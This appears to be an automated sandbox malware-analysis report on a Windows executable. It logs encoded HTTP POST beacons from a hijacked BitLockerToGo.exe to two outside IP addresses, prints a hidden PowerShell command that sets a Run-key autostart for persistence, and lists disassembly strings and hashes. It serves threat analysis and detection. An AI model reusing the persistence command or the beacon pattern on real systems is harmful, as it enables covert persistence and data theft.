                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.45001791.212.166.91807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:04:14.991453886 CEST299OUTPOST / HTTP/1.1
                                          Host: 91.212.166.91
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: 4zC63Lsg
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:04:15.922864914 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:04:15 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          14192.168.2.450021188.130.206.243807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:04:15.966000080 CEST301OUTPOST / HTTP/1.1
                                          Host: 188.130.206.243
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: 862w18Vn
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:04:16.959208965 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:04:16 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:08:02:38
                                          Start date:18/10/2024
                                          Path:C:\Users\user\Desktop\BwqqVoHR71.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\BwqqVoHR71.exe"
                                          Imagebase:0x840000
                                          File size:19'172'088 bytes
                                          MD5 hash:0A21A94198F6157ABB36BF55CB43BE27
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:08:02:52
                                          Start date:18/10/2024
                                          Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                          Imagebase:0xcb0000
                                          File size:231'736 bytes
                                          MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:6
                                          Start time:08:03:00
                                          Start date:18/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
                                          Imagebase:0x720000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:08:03:00
                                          Start date:18/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:08:03:11
                                          Start date:18/10/2024
                                          Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                          Imagebase:0xcb0000
                                          File size:231'736 bytes
                                          MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Non-executed Functions

                                            Function 0087B890 Relevance: 11.4, Strings: 9, Instructions: 189COMMON
                                            Download Yara Rule
                                            Strings
                                            • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timergamepaddb: unexpected platform: %s3552713678800500929355621337890625Venezuela (Bolivarian , xrefs: 0087BB32
                                            • runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 0087BAFE
                                            • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg,, xrefs: 0087BBB4
                                            • runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg, Volgogradapplication/x-bytecode.elisp (compi, xrefs: 0087BB59
                                            • ) @s Pn=][}]i)> +)(tvrRuUeEaAlLsSbBoOxX+-nNiIfFpP+a-a25\fALAKAZARCACOCTDEFLGAHIINIAKSKYLAMEMDMAMIMNMSMOMTNENVNHNJNMNYNCNDOHOKORPARISCSDTNTXUTVTVAWAWVWIWYAEAAAPADAFAGAIAOAQASATAUAWAXBABBBDBEBFBGBHBIBJBLBMBNBOBQBRBTBVBWBYBZCCCDCFCGCHCICKCLCMCNCRCUCVCWCX, xrefs: 0087BABC
                                            • %, xrefs: 0087BBF1
                                            • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!atlas: the image is already allocated2220446049250313080847263336181640625H, xrefs: 0087BBE8
                                            • CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=gamepad: IDirectInputDevice8::Acquire failed: %wgraphicscommand: a screen image cannot be dumpedstrconv: illegal App, xrefs: 0087BB8D
                                            • bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)FillRule(%d)GetCursorPosleftshoulderrighttrigger15258789, xrefs: 0087BAD7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1992489804.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                            • Associated: 00000000.00000002.1992465642.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1992782995.0000000000D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1992782995.000000000171E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1995409002.00000000019A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1995427189.00000000019A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1995477141.00000000019AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1995936120.00000000019AB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1995981794.00000000019AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996001964.00000000019AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996048401.0000000001A10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996061779.0000000001A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996074266.0000000001A14000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996089045.0000000001A1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996100966.0000000001A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996113479.0000000001A20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996128915.0000000001A21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996128915.0000000001A2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996128915.0000000001A64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996128915.0000000001A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996196049.0000000001A6D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996208098.0000000001A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996208098.0000000001AB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1996208098.0000000001AC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_840000_BwqqVoHR71.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$) @s Pn=][}]i)> +)(tvrRuUeEaAlLsSbBoOxX+-nNiIfFpP+a-a25\fALAKAZARCACOCTDEFLGAHIINIAKSKYLAMEMDMAMIMNMSMOMTNENVNHNJNMNYNCNDOHOKORPARISCSDTNTXUTVTVAWAWVWIWYAEAAAPADAFAGAIAOAQASATAUAWAXBABBBDBEBFBGBHBIBJBLBMBNBOBQBRBTBVBWBYBZCCCDCFCGCHCICKCLCMCNCRCUCVCWCX$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=gamepad: IDirectInputDevice8::Acquire failed: %wgraphicscommand: a screen image cannot be dumpedstrconv: illegal App$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timergamepaddb: unexpected platform: %s3552713678800500929355621337890625Venezuela (Bolivarian $bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)FillRule(%d)GetCursorPosleftshoulderrighttrigger15258789$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg,$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!atlas: the image is already allocated2220446049250313080847263336181640625H$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg, Volgogradapplication/x-bytecode.elisp (compi$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
                                            • API String ID: 0-290768958
                                            • Opcode ID: 1fe562796d133b50ae8726bc99b547644a605091aac4cdda96a541f6ab3ca48a
                                            • Instruction ID: f7f45d5f32b440e1acc47483039ac06f002bf87f13c81e789859e23c3f399826
                                            • Opcode Fuzzy Hash: 1fe562796d133b50ae8726bc99b547644a605091aac4cdda96a541f6ab3ca48a
                                            • Instruction Fuzzy Hash: BA91BAB45087058FD350EF68D099B5ABBE0FF89708F10896CE5888B392E775E949CF52

                                            Executed Functions

                                            Function 04707A75 Relevance: .6, Instructions: 565COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2002417062.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4700000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 180360e4cdc75274ed0d50b2b770a091fc2aed36209b78a9c3c3875f3fc8ad39
                                            • Instruction ID: 862e471e821d8338dabcbabb455b3a3ff8cc54f2456cbab18036ed57df9297d9
                                            • Opcode Fuzzy Hash: 180360e4cdc75274ed0d50b2b770a091fc2aed36209b78a9c3c3875f3fc8ad39
                                            • Instruction Fuzzy Hash: 3421F935B01118DFCB08DFA9D58499DBBF2EF88310B25C195E505AB3A1CB35EC868B90
                                            Function 04706DE8 Relevance: .3, Instructions: 275COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2002417062.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4700000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f259140b55326634f09e4453c8d465e5ad029ebd1529faf32831370d60bc535d
                                            • Instruction ID: 103e89fcffff1d96449074fbb1c654c65a9298585b2d0c87e3fff39eeba90e5a
                                            • Opcode Fuzzy Hash: f259140b55326634f09e4453c8d465e5ad029ebd1529faf32831370d60bc535d
                                            • Instruction Fuzzy Hash: 29B16D74A06204DFCB14CFA8C4909AEBBF2FF89314F1585A9E4459B3A2D735EC46CB50
                                            Function 04702AA0 Relevance: .2, Instructions: 216COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2002417062.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4700000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23229ab155db6004125d099b29d650021b58c957810af4edf774f237d538e8ea
                                            • Instruction ID: 27dfbe5499bd7b870d808f4ece6826641afded542eac264115dd7111792df391
                                            • Opcode Fuzzy Hash: 23229ab155db6004125d099b29d650021b58c957810af4edf774f237d538e8ea
                                            • Instruction Fuzzy Hash: F8916BB5A01205DFCB15CF59C494AAEBBB1FF48310B248699D915AB3A2C735FC51CBA0
                                            Function 04702BB0 Relevance: .1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2002417062.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4700000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b14f7624488cd959ae8e73d3f20d7c97f3ba01ff1fe2bcef2ae03215f119aed
                                            • Instruction ID: d7c80f8ca502f73193f8de8b87b1c5b4006548315170f84ddd49cfa45bebabc1
                                            • Opcode Fuzzy Hash: 5b14f7624488cd959ae8e73d3f20d7c97f3ba01ff1fe2bcef2ae03215f119aed
                                            • Instruction Fuzzy Hash: 894125B5A01109DFCB09CF59C498AAEFBB1FF48314B158699D805AB3A5C732FC51CBA0
                                            Function 04707AA4 Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2002417062.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4700000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 91c806970792f9de3888b1cb216f0c16cfeba4aff6bacb2462c1b78e91f46402
                                            • Instruction ID: 2901982d3c9565e5df29f41f11f66ef51e34b063a185fdbf8d3f16a3b771576f
                                            • Opcode Fuzzy Hash: 91c806970792f9de3888b1cb216f0c16cfeba4aff6bacb2462c1b78e91f46402
                                            • Instruction Fuzzy Hash: CD11E278A01108DFCB08DFA9E58099DFBF2FF88314F25C1A5E904A7351C735AD858BA0
                                            Function 02D0D01D Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2001563261.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2d0d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7529a5bc87e26966e5d6959aab05e330d32bfe1e03abd363632ca702a6b19207
                                            • Instruction ID: 3e63578a7bf9b58699dcd755499ad292444b2a9befda1b2e37b3695f482cec51
                                            • Opcode Fuzzy Hash: 7529a5bc87e26966e5d6959aab05e330d32bfe1e03abd363632ca702a6b19207
                                            • Instruction Fuzzy Hash: 8F01A2B15093409AE7208EA9C9C4F66BF99DF41364F28C41BED8C4B3E2C7799C41C6B1
                                            Function 02D0D005 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2001563261.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2d0d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: baab052f28f895015c4996d8674275c61af09a6860d2baa8c63416f9351ba88a
                                            • Instruction ID: ec6535290c7d9a082e72b69ebedd9b2dc7b10efae32f57e533fea7a8cc89decd
                                            • Opcode Fuzzy Hash: baab052f28f895015c4996d8674275c61af09a6860d2baa8c63416f9351ba88a
                                            • Instruction Fuzzy Hash: 57015E7240E3C05EE7128B258994B56BFB8DF53224F1DC0DBD9888F2E3C2695849C772